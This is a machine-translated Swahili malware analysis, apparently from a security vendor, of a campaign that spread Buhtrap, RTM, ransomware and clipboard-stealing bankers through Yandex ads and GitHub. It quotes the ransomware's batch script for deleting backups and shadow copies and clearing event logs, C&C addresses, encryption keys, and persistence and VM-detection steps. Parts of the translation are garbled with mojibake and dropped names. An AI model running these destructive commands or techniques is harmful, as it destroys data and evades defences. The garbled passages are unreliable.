Ili kulenga wahasibu katika mashambulizi ya mtandao, unaweza kutumia hati za kazi wanazotafuta mtandaoni. Hii ni takribani kile kikundi cha mtandao kimekuwa kikifanya katika miezi michache iliyopita, kusambaza milango inayojulikana. ΠΈ , pamoja na wasindikaji na programu za kuiba sarafu za siri. Malengo mengi iko nchini Urusi. Shambulio hilo lilifanywa kwa kuweka matangazo mabaya kwenye Yandex.Direct. Waathiriwa watarajiwa walielekezwa kwa tovuti ambapo waliulizwa kupakua faili hasidi iliyofichwa kama kiolezo cha hati. Yandex iliondoa utangazaji mbaya baada ya onyo letu.
Msimbo wa chanzo wa Buhtrap umevuja mtandaoni siku za nyuma ili mtu yeyote aweze kuutumia. Hatuna taarifa kuhusu upatikanaji wa msimbo wa RTM.
Katika chapisho hili tutakuambia jinsi washambuliaji walivyosambaza programu hasidi kwa kutumia Yandex.Direct na kuikaribisha kwenye GitHub. Chapisho litahitimishwa kwa uchanganuzi wa kiufundi wa programu hasidi.
Buhtrap na RTM zimerejea katika biashara
Utaratibu wa kuenea na waathirika
Mizigo mbalimbali inayowasilishwa kwa waathiriwa inashiriki utaratibu wa kawaida wa uenezaji. Faili zote hasidi zilizoundwa na washambuliaji ziliwekwa kwenye hazina mbili tofauti za GitHub.
Kwa kawaida, hifadhi ilikuwa na faili moja mbaya inayoweza kupakuliwa, ambayo ilibadilika mara kwa mara. Kwa kuwa unaweza kuona historia ya mabadiliko kwenye hazina kwenye GitHub, tunaweza kuona ni aina gani ya programu hasidi ilisambazwa katika kipindi fulani. Ili kumshawishi mwathirika kupakua faili mbaya, tovuti ya blanki-shabloni24[.]ru, iliyoonyeshwa kwenye takwimu hapo juu, ilitumiwa.
Muundo wa tovuti na majina yote ya faili hasidi hufuata dhana moja - fomu, violezo, mikataba, sampuli, n.k. Kwa kuzingatia kwamba programu ya Buhtrap na RTM tayari imetumika katika mashambulizi dhidi ya wahasibu hapo awali, tulidhani kwamba mkakati katika kampeni mpya ni sawa. Swali pekee ni jinsi mwathirika alifika kwenye tovuti ya washambuliaji.
Maambukizi
Angalau waathiriwa kadhaa ambao waliishia kwenye tovuti hii walivutiwa na utangazaji hasidi. Chini ni mfano wa URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kama unavyoona kwenye kiungo, bango lilibandikwa kwenye jukwaa halali la uhasibu bb.f2[.]kz. Ni muhimu kutambua kwamba mabango yalionekana kwenye tovuti tofauti, zote zilikuwa na kitambulisho sawa cha kampeni (blanki_rsya), na nyingi zinazohusiana na uhasibu au huduma za usaidizi wa kisheria. URL inaonyesha kuwa mwathiriwa anayetarajiwa alitumia ombi la "fomu ya kupakua ankara," ambayo inaunga mkono nadharia yetu ya mashambulizi yaliyolengwa. Chini ni tovuti ambazo mabango yalionekana na maswali yanayolingana ya utafutaji.
- pakua fomu ya ankara - bb.f2[.]kz
- sampuli ya mkataba - Ipopen[.]ru
- sampuli ya malalamiko ya maombi - 77metrov[.]ru
- fomu ya makubaliano - blank-dogovor-kupli-prodazhi[.]ru
- sampuli ya ombi la mahakama - zen.yandex[.]ru
- sampuli ya malalamiko - yurday[.]ru
- sampuli za fomu za mkataba - Regforum[.]ru
- fomu ya mkataba - assistentus[.]ru
- sampuli ya makubaliano ya ghorofa β napravah[.]com
- sampuli za mikataba ya kisheria - avito[.]ru
Tovuti ya blanki-shabloni24[.]ru inaweza kuwa imesanidiwa kupitisha tathmini rahisi ya kuona. Kwa kawaida, tangazo linaloelekeza kwenye tovuti inayoonekana kitaalamu iliyo na kiungo cha GitHub haionekani kuwa mbaya. Kwa kuongezea, wavamizi walipakia faili hasidi kwenye hazina kwa muda mfupi tu, ikiwezekana wakati wa kampeni. Mara nyingi, hazina ya GitHub ilikuwa na kumbukumbu tupu ya zip au faili tupu ya EXE. Kwa hivyo, washambuliaji wanaweza kusambaza matangazo kupitia Yandex.Direct kwenye tovuti ambazo kuna uwezekano mkubwa zilitembelewa na wahasibu ambao walikuja kujibu maswali maalum ya utafutaji.
Ifuatayo, hebu tuangalie mizigo mbalimbali inayosambazwa kwa njia hii.
Uchambuzi wa Upakiaji
Kronolojia ya usambazaji
Kampeni hiyo mbaya ilianza mwishoni mwa Oktoba 2018 na inatumika wakati wa kuandika. Kwa kuwa hazina nzima ilipatikana kwa umma kwenye GitHub, tulikusanya ratiba sahihi ya usambazaji wa familia sita tofauti za programu hasidi (ona mchoro hapa chini). Tumeongeza mstari unaoonyesha wakati kiungo cha bango kiligunduliwa, kama ilivyopimwa na ESET telemetry, kwa kulinganisha na historia ya git. Kama unavyoona, hii inahusiana vyema na upatikanaji wa malipo kwenye GitHub. Tofauti ya mwisho wa Februari inaweza kuelezewa na ukweli kwamba hatukuwa na sehemu ya historia ya mabadiliko kwa sababu hazina iliondolewa kutoka GitHub kabla ya kuipata kamili.
Kielelezo 1. Mwenendo wa usambazaji wa programu hasidi.
Vyeti vya Kusaini Msimbo
Kampeni ilitumia vyeti vingi. Baadhi zilitiwa saini na zaidi ya familia moja ya programu hasidi, ambayo inaonyesha zaidi kuwa sampuli tofauti zilikuwa za kampeni moja. Licha ya upatikanaji wa ufunguo wa faragha, waendeshaji hawakutia sahihi jozi kwa utaratibu na hawakutumia ufunguo kwa sampuli zote. Mwishoni mwa Februari 2019, wavamizi walianza kuweka sahihi batili kwa kutumia cheti kinachomilikiwa na Google ambacho hawakuwa na ufunguo wa faragha.
Vyeti vyote vinavyohusika katika kampeni na familia zisizo na programu wanazotia saini vimeorodheshwa kwenye jedwali lililo hapa chini.
Pia tumetumia vyeti hivi vya kutia saini msimbo ili kuanzisha viungo na familia zingine zisizo na programu. Kwa vyeti vingi, hatukupata sampuli ambazo hazijasambazwa kupitia hazina ya GitHub. Hata hivyo, cheti cha TOV βMARIYAβ kilitumika kutia saini programu hasidi ya botnet , adware na wachimbaji. Kuna uwezekano kwamba programu hasidi hii inahusiana na kampeni hii. Uwezekano mkubwa zaidi, cheti kilinunuliwa kwenye gizanet.
Win32/Filecoder.Buhtrap
Sehemu ya kwanza iliyovutia umakini wetu ilikuwa Win32/Filecoder.Buhtrap iliyogunduliwa hivi karibuni. Hii ni faili ya binary ya Delphi ambayo wakati mwingine huwekwa. Ilisambazwa zaidi mnamo Februari-Machi 2019. Inafanya kazi kama inavyofaa mpango wa ransomware - hutafuta anatoa za ndani na folda za mtandao na kusimba faili inazopata. Haihitaji muunganisho wa Mtandao ili kuathiriwa kwa sababu haiwasiliani na seva kutuma vitufe vya usimbaji fiche. Badala yake, inaongeza "ishara" hadi mwisho wa ujumbe wa fidia, na inapendekeza kutumia barua pepe au Bitmessage kuwasiliana na waendeshaji.
Ili kusimba rasilimali nyingi nyeti iwezekanavyo, Filecoder.Buhtrap huendesha thread iliyoundwa ili kuzima programu muhimu ambayo inaweza kuwa na vidhibiti vilivyo wazi vya faili vilivyo na maelezo muhimu ambayo yanaweza kutatiza usimbaji fiche. Michakato inayolengwa ni mifumo ya usimamizi wa hifadhidata (DBMS). Kwa kuongeza, Filecoder.Buhtrap hufuta faili za kumbukumbu na chelezo ili kufanya urejeshaji wa data kuwa mgumu. Ili kufanya hivyo, endesha hati ya kundi hapa chini.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap hutumia huduma halali ya mtandaoni ya Logger ya IP iliyoundwa kukusanya taarifa kuhusu wanaotembelea tovuti. Hii inakusudiwa kufuatilia wahasiriwa wa programu ya ukombozi, ambayo ni jukumu la safu ya amri:
mshta.exe "javascript:document.write('');"
Faili za usimbaji fiche huchaguliwa ikiwa hazilingani na orodha tatu za kutengwa. Kwanza, faili zilizo na viendelezi vifuatavyo hazijasimbwa kwa njia fiche: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys na .bat. Pili, faili zote ambazo njia kamili ina safu za saraka kutoka kwa orodha iliyo hapa chini hazijajumuishwa.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Tatu, majina fulani ya faili pia hayajajumuishwa kwenye usimbaji fiche, miongoni mwao ni jina la faili la ujumbe wa fidia. Orodha imewasilishwa hapa chini. Kwa wazi, tofauti hizi zote zinakusudiwa kufanya mashine iendelee, lakini kwa ustahili mdogo wa barabara.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Mpango wa usimbuaji faili
Mara baada ya kutekelezwa, programu hasidi hutengeneza jozi ya ufunguo wa RSA wa 512-bit. Kipeo kikuu cha faragha (d) na modulus (n) kisha husimbwa kwa ufunguo wa umma wa biti 2048 wenye msimbo mgumu (kipeo cha umma na moduli), zlib-packed, na base64 iliyosimbwa. Nambari inayohusika na hii imeonyeshwa kwenye Kielelezo 2.
Mchoro 2. Matokeo ya mtengano wa Hex-Rays wa mchakato wa uundaji wa jozi za funguo za 512-bit RSA.
Ufuatao ni mfano wa maandishi wazi yenye ufunguo wa faragha uliozalishwa, ambao ni tokeni iliyoambatishwa kwa ujumbe wa fidia.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Ufunguo wa umma wa washambuliaji umetolewa hapa chini.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Faili zimesimbwa kwa njia fiche kwa kutumia AES-128-CBC na ufunguo wa 256-bit. Kwa kila faili iliyosimbwa, ufunguo mpya na vekta mpya ya uanzishaji hutolewa. Taarifa muhimu huongezwa hadi mwisho wa faili iliyosimbwa. Wacha tuchunguze muundo wa faili iliyosimbwa.
Faili zilizosimbwa kwa njia fiche zina kichwa kifuatacho:
Data ya faili ya chanzo pamoja na kuongeza thamani ya uchawi ya VEGA imesimbwa kwa baiti 0x5000 za kwanza. Taarifa zote za usimbuaji zimeambatishwa kwenye faili iliyo na muundo ufuatao:
- Alama ya saizi ya faili ina alama inayoonyesha ikiwa faili ni kubwa kuliko baiti 0x5000 kwa saizi
β Bluu ya vitufe vya AES = ZlibCompress(RSAEncrypt(ufunguo wa AES + IV, ufunguo wa umma wa jozi ya vitufe vya RSA))
- Ufungaji wa vitufe vya RSA = ZlibCompress(RSAEncrypt(ufunguo wa faragha uliotengenezwa wa RSA, ufunguo wa umma wa RSA wenye msimbo mgumu))
Win32/ClipBanker
Win32/ClipBanker ni kijenzi ambacho kilisambazwa mara kwa mara kuanzia mwishoni mwa Oktoba hadi mapema Desemba 2018. Jukumu lake ni kufuatilia yaliyomo kwenye ubao wa kunakili, inatafuta anwani za pochi za cryptocurrency. Baada ya kuamua anwani ya mkoba inayolengwa, ClipBanker itabadilisha na kuweka anwani inayoaminika kuwa ya waendeshaji. Sampuli tulizochunguza hazikuwa na boksi wala kufutika. Mbinu pekee inayotumika kuficha tabia ni usimbaji fiche wa kamba. Anwani za pochi ya opereta zimesimbwa kwa njia fiche kwa kutumia RC4. Fedha za siri zinazolengwa ni Bitcoin, Bitcoin cash, Dogecoin, Ethereum na Ripple.
Katika kipindi ambacho programu hasidi ilikuwa ikienea kwa washambuliaji wa pochi za Bitcoin, kiasi kidogo kilitumwa kwa VTS, ambayo inatia shaka juu ya mafanikio ya kampeni. Zaidi ya hayo, hakuna ushahidi wa kupendekeza kwamba miamala hii ilihusiana na ClipBanker hata kidogo.
Win32/RTM
Sehemu ya Win32/RTM ilisambazwa kwa siku kadhaa mapema Machi 2019. RTM ni benki ya Trojan iliyoandikwa huko Delphi, inayolenga mifumo ya benki ya mbali. Mnamo 2017, watafiti wa ESET walichapisha ya mpango huu, maelezo bado ni muhimu. Mnamo Januari 2019, Mitandao ya Palo Alto pia ilitolewa .
Kipakiaji cha Bhutrap
Kwa muda, kipakuzi kilipatikana kwenye GitHub ambacho hakikuwa sawa na zana za awali za Buhtrap. Anageuka kwa https://94.100.18[.]67/RSS.php?<some_id> kupata hatua inayofuata na kuipakia moja kwa moja kwenye kumbukumbu. Tunaweza kutofautisha tabia mbili za msimbo wa hatua ya pili. Katika URL ya kwanza, RSS.php ilipitisha mlango wa nyuma wa Buhtrap moja kwa moja - mlango huu wa nyuma unafanana sana na ule unaopatikana baada ya msimbo wa chanzo kuvuja.
Cha kufurahisha, tunaona kampeni kadhaa zilizo na mlango wa nyuma wa Buhtrap, na zinadaiwa kuendeshwa na waendeshaji tofauti. Katika kesi hii, tofauti kuu ni kwamba mlango wa nyuma umewekwa moja kwa moja kwenye kumbukumbu na haitumii mpango wa kawaida na mchakato wa kupeleka DLL ambao tulizungumzia. . Kwa kuongeza, waendeshaji walibadilisha ufunguo wa RC4 unaotumiwa kusimba trafiki ya mtandao kwa seva ya C&C. Katika kampeni nyingi ambazo tumeona, waendeshaji hawakujisumbua kubadilisha ufunguo huu.
Tabia ya pili, ngumu zaidi ilikuwa kwamba URL ya RSS.php ilipitishwa kwa kipakiaji kingine. Ilitekeleza upotoshaji fulani, kama vile kuunda upya jedwali linalobadilika la uingizaji. Madhumuni ya bootloader ni kuwasiliana na seva ya C&C [.]com/api/F27F84EDA4D13B15/2, tuma kumbukumbu na usubiri jibu. Huchakata jibu kama blob, hupakia kwenye kumbukumbu na kuitekeleza. Mzigo tulioona ukitumia kipakiaji hiki ulikuwa mlango ule ule wa Buhtrap, lakini kunaweza kuwa na vipengele vingine.
Android/Spy.Banker
Inafurahisha, sehemu ya Android pia ilipatikana kwenye hazina ya GitHub. Alikuwa katika tawi kuu kwa siku moja tu - Novemba 1, 2018. Kando na kuchapishwa kwenye GitHub, telemetry ya ESET haipati ushahidi wowote wa programu hasidi kusambazwa.
Kipengele hiki kilipangishwa kama Kifurushi cha Programu ya Android (APK). Imefichwa sana. Tabia hii mbaya imefichwa katika JAR iliyosimbwa kwa njia fiche iliyo katika APK. Imesimbwa kwa njia fiche na RC4 kwa kutumia ufunguo huu:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Ufunguo sawa na algoriti hutumiwa kusimba mifuatano. JAR iko ndani APK_ROOT + image/files. Biti 4 za kwanza za faili zina urefu wa JAR iliyosimbwa, ambayo huanza mara baada ya uwanja wa urefu.
Baada ya kusimbua faili, tuligundua kuwa ilikuwa Anubis - hapo awali benki kwa ajili ya Android. Programu hasidi ina sifa zifuatazo:
- kurekodi maikrofoni
- kuchukua picha za skrini
- kupata viwianishi vya GPS
- keylogger
- usimbaji fiche wa data ya kifaa na mahitaji ya fidia
- kutuma barua taka
Jambo la kufurahisha ni kwamba benki hiyo ilitumia Twitter kama njia mbadala ya mawasiliano kupata seva nyingine ya C&C. Sampuli tuliyochanganua ilitumia akaunti ya @JonesTrader, lakini wakati wa uchambuzi ilikuwa tayari imezuiwa.
Benki ina orodha ya programu zinazolengwa kwenye kifaa cha Android. Ni ndefu kuliko orodha iliyopatikana katika utafiti wa Sophos. Orodha hiyo inajumuisha maombi mengi ya benki, programu za ununuzi mtandaoni kama vile Amazon na eBay, na huduma za cryptocurrency.
MSIL/ClipBanker.IH
Sehemu ya mwisho iliyosambazwa kama sehemu ya kampeni hii ilikuwa .NET Windows inayoweza kutekelezwa, ambayo ilionekana Machi 2019. Matoleo mengi yaliyosomwa yaliwekwa kwenye ConfuserEx v1.0.0. Kama ClipBanker, sehemu hii hutumia ubao wa kunakili. Lengo lake ni aina mbalimbali za fedha za crypto, pamoja na matoleo kwenye Steam. Zaidi ya hayo, anatumia huduma ya IP Logger kuiba ufunguo wa Bitcoin binafsi wa WIF.
Mbinu za Ulinzi
Kando na manufaa ambayo ConfuserEx hutoa katika kuzuia utatuzi, utupaji na kuchezea, kipengele hiki kinajumuisha uwezo wa kutambua bidhaa za kingavirusi na mashine pepe.
Ili kuthibitisha kuwa inaendeshwa kwa mashine pepe, programu hasidi hutumia laini ya amri ya Windows WMI (WMIC) iliyojengwa ndani ili kuomba maelezo ya BIOS, ambayo ni:
wmic bios
Kisha programu huchanganua pato la amri na hutafuta maneno muhimu: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Ili kugundua bidhaa za antivirus, programu hasidi hutuma ombi la Windows Management Instrumentation (WMI) kwa Kituo cha Usalama cha Windows kwa kutumia ManagementObjectSearcher API kama inavyoonyeshwa hapa chini. Baada ya kuorodhesha kutoka kwa base64 simu inaonekana kama hii:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Kielelezo 3. Mchakato wa kutambua bidhaa za antivirus.
Kwa kuongezea, programu hasidi hukagua ikiwa , zana ya kulinda dhidi ya mashambulizi ya ubao wa kunakili na, ikiwa inaendeshwa, husimamisha nyuzi zote katika mchakato huo, na hivyo kuzima ulinzi.
Kudumu
Toleo la programu hasidi tulilojifunza linajinakili ndani yake %APPDATA%googleupdater.exe na huweka sifa "iliyofichwa" kwa saraka ya google. Kisha anabadilisha thamani SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell kwenye Usajili wa Windows na kuongeza njia updater.exe. Kwa njia hii, programu hasidi itatekelezwa kila mtumiaji anapoingia.
Tabia mbaya
Kama vile ClipBanker, programu hasidi hufuatilia yaliyomo kwenye ubao wa kunakili na kutafuta anwani za mkoba wa sarafu-fiche, na inapopatikana, huibadilisha na mojawapo ya anwani za opereta. Ifuatayo ni orodha ya anwani lengwa kulingana na kile kinachopatikana kwenye msimbo.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Kwa kila aina ya anwani kuna usemi unaolingana wa kawaida. Thamani ya STEAM_URL inatumika kushambulia mfumo wa Steam, kama inavyoweza kuonekana kutoka kwa usemi wa kawaida unaotumika kufafanua katika bafa:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kituo cha kuchuja
Kando na kubadilisha anwani katika bafa, programu hasidi inalenga funguo za kibinafsi za WIF za pochi za Bitcoin, Bitcoin Core na Electrum Bitcoin. Programu hutumia plogger.org kama njia ya kuchuja ili kupata ufunguo wa faragha wa WIF. Ili kufanya hivyo, waendeshaji huongeza data ya ufunguo wa faragha kwenye kichwa cha HTTP cha Wakala wa Mtumiaji, kama inavyoonyeshwa hapa chini.
Kielelezo 4. IP Logger console na data ya pato.
Waendeshaji hawakutumia iplogger.org kuchuja pochi. Labda waliamua kutumia njia tofauti kwa sababu ya kikomo cha herufi 255 kwenye uwanja User-Agentinavyoonyeshwa kwenye kiolesura cha wavuti cha IP Logger. Katika sampuli tulizosoma, seva nyingine ya pato ilihifadhiwa katika utofauti wa mazingira DiscordWebHook. Kwa kushangaza, utofauti huu wa mazingira haujapewa mahali popote kwenye nambari. Hii inapendekeza kuwa programu hasidi bado inatengenezwa na utofauti huo umekabidhiwa kwa mashine ya majaribio ya waendeshaji.
Kuna ishara nyingine kwamba programu iko katika maendeleo. Faili ya jozi inajumuisha URL mbili za iplogger.org, na zote mbili huulizwa data inapochujwa. Katika ombi kwa mojawapo ya URL hizi, thamani katika uga wa Mrejelea hutanguliwa na "DEV /". Pia tulipata toleo ambalo halikufungashwa kwa kutumia ConfuserEx, mpokeaji wa URL hii anaitwa DevFeedbackUrl. Kulingana na jina la utofauti wa mazingira, tunaamini kuwa waendeshaji wanapanga kutumia huduma halali ya Discord na mfumo wake wa udukuzi wa wavuti ili kuiba pochi za cryptocurrency.
Hitimisho
Kampeni hii ni mfano wa matumizi ya huduma halali za utangazaji katika mashambulizi ya mtandao. Mpango huo unalenga mashirika ya Kirusi, lakini hatutashangaa kuona shambulio kama hilo kwa kutumia huduma zisizo za Kirusi. Ili kuepuka maelewano, watumiaji lazima wawe na ujasiri katika sifa ya chanzo cha programu wanayopakua.
Orodha kamili ya viashirio vya maelewano na sifa za MITER ATT&CK inapatikana kwa .
Chanzo: mapenzi.com